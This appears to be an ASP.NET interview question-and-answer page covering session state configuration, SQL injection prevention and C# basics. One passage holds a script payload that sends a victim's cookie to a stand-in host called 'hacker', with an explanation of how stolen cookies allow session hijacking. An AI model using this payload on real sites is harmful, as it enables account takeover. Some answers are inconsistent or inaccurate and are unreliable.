Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
config file:
All the Web.config files inherit the root Web.config file available at the following location
systemroot\Microsoft.NET\Framework\versionNumber\CONFIG\Web.config
<configuration> tag is the root element of the Web.config file under which it has all the
remaining sub elements.
What is Session?
Ans: We know that Http is stateless, means when we open a webpage and fill some
information and then move to next page then the data which we have entered will lost.
It happed do to Http protocol stateless nature. So here session come into existence,
Session provide us the way of storing data in server memory. So you can store your page
data into server
memory and retrieve it back during page postbacks.
Can you describe all the property set in web.config under session state?
Ans:
Code:
<configuration>
<sessionstate
mode="inproc"
cookieless="false"
timeout="20"
sqlconnectionstring="data source=127.0.0.1;user id=<userid>;password=<password>"
server="127.0.0.1"
port="42424"/>
</configuration>
Mode: The mode setting supports three options: inproc, sqlserver, and stateserver. As
stated earlier, ASP.NET supports two modes: in process and out of process. There are also
two options for out-of-process state management: memory based (stateserver), and SQL
Server based (sqlserver). We'll discuss implementing these options shortly.
Cookieless: The cookieless option for ASP.NET is configured with this simple Boolean
setting.
Timeout: This option controls the length of time a session is considered valid. The session
timeout is a sliding value; on each request the timeout period is set to the current time
plus the timeout value
Sqlconnectionstring: The sqlconnectionstring identifies the database connection string
that names the database used for mode sqlserver.
Server: In the out-of-process mode stateserver, it names the server that is running the
required Windows NT service: ASPState.
Port: The port setting, which accompanies the server setting, identifies the port number
that corresponds to the server setting for mode stateserver.
Q 7:- If you are not using Stored Procedure, think you are using simple sql statment
then what you will do to prevent SQL injections?
Ans:- If the code does not use stored procedures, make sure that it uses parameters in
the SQL statements it constructs, as shown in the following example.
select status from Users where UserName=@userName
I will check that the code does not use the following approach, where the input is used
directly to construct the executable SQL statement by using string concatenation.
string sql = "select status from Users where UserName='"
+ txtUserName.Text + "'";
Example 1.
For example, the HTML snippet:
<title>Example document: %(title)</title>
is intended to illustrate a template snippet that, if the variable title has value Cross-Site
Scripting, results in the following HTML to be emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a
search query looking something like this:
<SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie
;</SCRIPT>
Sitting on the other end, at the Webserver, you will be receiving hits where after a
double space is the users cookie. You might strike lucky if an administrator clicks the link,
allowing you to steal their sessionID and hijack the session.
Forms Authentication: Under Forms Authentication user can able to create their own
login name and password it is basically a cookie based
authentication system which stores the login name and
password in database file.
We know that Base class constructor called first. But if we creating object with parameters,
and base class have both constructor default and parameterized, then which constructor of
baseclass called first.
Ans: Base class default constructor called first.
Then what you can do that base class parameterized constructor call first.
Ans: We can use "Base" Keyword.
If we have an abstract method in base class, then we must need to override(or use new
keyword) it or not?
Ans: Yes, if we not override it then it give error
ASP.NET MVC 4 INTERVIEW QUESTIONS AND ANSWERS